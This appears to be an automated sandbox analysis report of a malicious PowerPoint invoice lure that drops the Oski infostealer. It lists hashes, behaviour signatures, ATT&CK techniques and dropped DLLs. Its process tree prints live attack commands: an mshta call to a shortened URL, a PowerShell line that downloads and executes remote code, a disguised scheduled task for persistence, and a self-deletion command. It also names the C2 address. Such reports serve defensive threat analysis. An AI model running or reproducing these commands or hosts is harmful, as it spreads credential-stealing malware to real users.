Analysis

  • max time kernel
    122s
  • max time network
    169s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    14-07-2021 07:12

General

  • Target

    DSV INV 103823 14072021.ppt

  • Size

    58KB

  • MD5

    4c5105952fcc267dc7b8bf5a2220fb51

  • SHA1

    9f43f9de80672d5d228d254394360ae362d9a673

  • SHA256

    5bd1784bd0379cb65a32f1c71989082c6b9168c150e18ba21b351b2320f667da

  • SHA512

    88f09a875c5e6164fec848a535b2601262e90f4c110ebf34acbdbc31bccc6684c1d2f98359347c325354197a252d02b644da4e20e7d68365a52cca736590a540

Malware Config

Extracted

Family

oski

C2

103.153.76.164/we/mark/

Signatures

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 16 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 5 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DSV INV 103823 14072021.ppt"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2004
      • C:\Windows\SysWOW64\mshta.exe
        mshta https://bitly.com/dhjkaydajkwyquibxcasad
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:1776
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 ;i'E'x(iwr('https://ia801508.us.archive.org/9/items/qw_20210713/mark.txt') -useB)
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1664
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            4⤵
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious use of WriteProcessMemory
            PID:1996
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /pid 1996 & erase C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe & RD /S /Q C:\\ProgramData\\078967905672141\\* & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1316
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /pid 1996
                6⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1740
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""MsHtA""\""https://randikhanaekminar.blogspot.com/p/mark.html"
          3⤵
          • Creates scheduled task(s)
          PID:1996

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    System Information Discovery

    2
    T1082

    Query Registry

    1
    T1012

    Collection

    Data from Local System

    1
    T1005

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      MD5

      2902de11e30dcc620b184e3bb0f0c1cb

      SHA1

      5d11d14a2558801a2688dc2d6dfad39ac294f222

      SHA256

      e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

      SHA512

      efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      MD5

      159a8546046489bc8d6242156cb7539c

      SHA1

      b7abf22bd510f0e0400b7538f215e9195bc046e8

      SHA256

      d38360011d544279618b421da767352559295f5beb2cf5308bdb273b6837e753

      SHA512

      f3898dbc2d4e8cda31e2920ac7d289d0fd66ada19ebcc0638593201b939742b8aa47539355e97b79d7179ecd2f259a2ddd2fe983e3f5dba7cc617e4b62cec39f

    • \ProgramData\mozglue.dll
      MD5

      8f73c08a9660691143661bf7332c3c27

      SHA1

      37fa65dd737c50fda710fdbde89e51374d0c204a

      SHA256

      3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

      SHA512

      0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

    • \ProgramData\msvcp140.dll
      MD5

      109f0f02fd37c84bfc7508d4227d7ed5

      SHA1

      ef7420141bb15ac334d3964082361a460bfdb975

      SHA256

      334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

      SHA512

      46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

    • \ProgramData\nss3.dll
      MD5

      bfac4e3c5908856ba17d41edcd455a51

      SHA1

      8eec7e888767aa9e4cca8ff246eb2aacb9170428

      SHA256

      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

      SHA512

      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

    • \ProgramData\sqlite3.dll
      MD5

      e477a96c8f2b18d6b5c27bde49c990bf

      SHA1

      e980c9bf41330d1e5bd04556db4646a0210f7409

      SHA256

      16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

      SHA512

      335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

    • \ProgramData\vcruntime140.dll
      MD5

      7587bf9cb4147022cd5681b015183046

      SHA1

      f2106306a8f6f0da5afb7fc765cfa0757ad5a628

      SHA256

      c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

      SHA512

      0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

    • memory/1316-104-0x0000000000000000-mapping.dmp
    • memory/1664-70-0x0000000002250000-0x0000000002E9A000-memory.dmp
      Filesize

      12.3MB

    • memory/1664-81-0x00000000060F0000-0x00000000060F1000-memory.dmp
      Filesize

      4KB

    • memory/1664-66-0x0000000000000000-mapping.dmp
    • memory/1664-71-0x0000000004740000-0x0000000004741000-memory.dmp
      Filesize

      4KB

    • memory/1664-72-0x0000000002650000-0x0000000002651000-memory.dmp
      Filesize

      4KB

    • memory/1664-73-0x0000000005240000-0x0000000005241000-memory.dmp
      Filesize

      4KB

    • memory/1664-76-0x0000000005FF0000-0x0000000005FF1000-memory.dmp
      Filesize

      4KB

    • memory/1664-69-0x0000000000C50000-0x0000000000C51000-memory.dmp
      Filesize

      4KB

    • memory/1664-82-0x0000000006180000-0x0000000006181000-memory.dmp
      Filesize

      4KB

    • memory/1664-89-0x0000000006280000-0x0000000006281000-memory.dmp
      Filesize

      4KB

    • memory/1664-90-0x00000000062C0000-0x00000000062C1000-memory.dmp
      Filesize

      4KB

    • memory/1664-91-0x000000007EF30000-0x000000007EF31000-memory.dmp
      Filesize

      4KB

    • memory/1664-94-0x00000000009E0000-0x00000000009E3000-memory.dmp
      Filesize

      12KB

    • memory/1740-105-0x0000000000000000-mapping.dmp
    • memory/1776-65-0x0000000000000000-mapping.dmp
    • memory/1996-67-0x0000000000000000-mapping.dmp
    • memory/1996-96-0x000000000040717B-mapping.dmp
    • memory/1996-98-0x0000000000400000-0x0000000000438000-memory.dmp
      Filesize

      224KB

    • memory/1996-95-0x0000000000400000-0x0000000000438000-memory.dmp
      Filesize

      224KB

    • memory/2004-64-0x000007FEFC471000-0x000007FEFC473000-memory.dmp
      Filesize

      8KB

    • memory/2004-62-0x0000000000000000-mapping.dmp
    • memory/2024-59-0x0000000074BD1000-0x0000000074BD5000-memory.dmp
      Filesize

      16KB

    • memory/2024-63-0x0000000076A81000-0x0000000076A83000-memory.dmp
      Filesize

      8KB

    • memory/2024-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2024-60-0x0000000071C71000-0x0000000071C73000-memory.dmp
      Filesize

      8KB